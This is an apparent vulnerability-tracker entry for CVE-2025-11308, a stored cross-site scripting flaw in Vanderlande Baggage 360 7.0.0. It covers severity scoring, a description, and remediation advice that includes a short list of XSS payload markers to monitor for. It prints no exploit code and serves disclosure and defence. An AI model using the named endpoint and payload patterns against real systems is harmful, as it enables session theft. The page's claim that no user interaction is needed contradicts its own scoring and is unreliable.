Vanderlande Baggage 360 CVE-2025-11308
LOWSeverity by source
CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:P/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X
Primary rating from NVD · only source for this CVE.
CVSS VectorNVD
CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:P/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X
Lifecycle Timeline
1DescriptionCVE.org
A vulnerability was identified in Vanderlande Baggage 360 7.0.0. This issue affects some unknown processing of the file /api-addons/v1/messages. Such manipulation of the argument Message leads to cross site scripting. The attack may be performed from remote. The exploit is publicly available and might be used. The vendor was contacted early about this disclosure but did not respond in any way.
AnalysisAI
Stored cross-site scripting in Vanderlande Baggage 360 7.0.0 allows authenticated remote attackers to inject malicious scripts via the Message parameter in the /api-addons/v1/messages endpoint, affecting integrity of stored data and potentially compromising user sessions when victims view poisoned messages. Exploitation requires user interaction (victim must view the message) and valid login credentials. Publicly available exploit code exists; EPSS score of 0.03% indicates low baseline exploitation probability despite public POC, suggesting the vulnerability requires specific triggering conditions or limited exposure in real deployments.
Technical ContextAI
The vulnerability resides in the /api-addons/v1/messages API endpoint within Vanderlande Baggage 360's addon message handler. The underlying issue is CWE-79 (Improper Neutralization of Input During Web Page Generation), where user-supplied input in the Message parameter is stored and later rendered without proper output encoding or sanitization. This creates a stored XSS vector: an attacker injects malicious JavaScript into the database, which persists and executes in the browsers of any user viewing that message. Unlike reflected XSS, stored variants are particularly dangerous in business systems as they can affect multiple users over an extended period without requiring direct user interaction with a malicious link.
Affected ProductsAI
Vanderlande Baggage 360 version 7.0.0 is confirmed affected. No CPE string is provided in available data. Newer versions (7.0.1+) or patched releases are not documented in the supplied references, suggesting vendor response status is unknown or patch availability is unconfirmed.
RemediationAI
Request a security update from Vanderlande for Baggage 360 addressing stored XSS in the /api-addons/v1/messages endpoint; specific patched version numbers are not currently available from vendor advisory. As a compensating control pending patch deployment, implement Content Security Policy (CSP) headers with strict script-src policies to prevent inline script execution, configure output encoding/HTML entity escaping for all message content rendered in the web interface, apply input validation to reject or sanitize Message parameters containing script tags or event handlers, and restrict message creation/viewing to trusted internal networks using network-level access controls. Monitor server logs for suspicious Message parameter submissions containing <script>, javascript:, onerror=, or similar payloads. Note: CSP mitigation may conflict with legitimate dynamic functionality - test thoroughly before production deployment.
Share
External POC / Exploit Code
Leaving vuln.today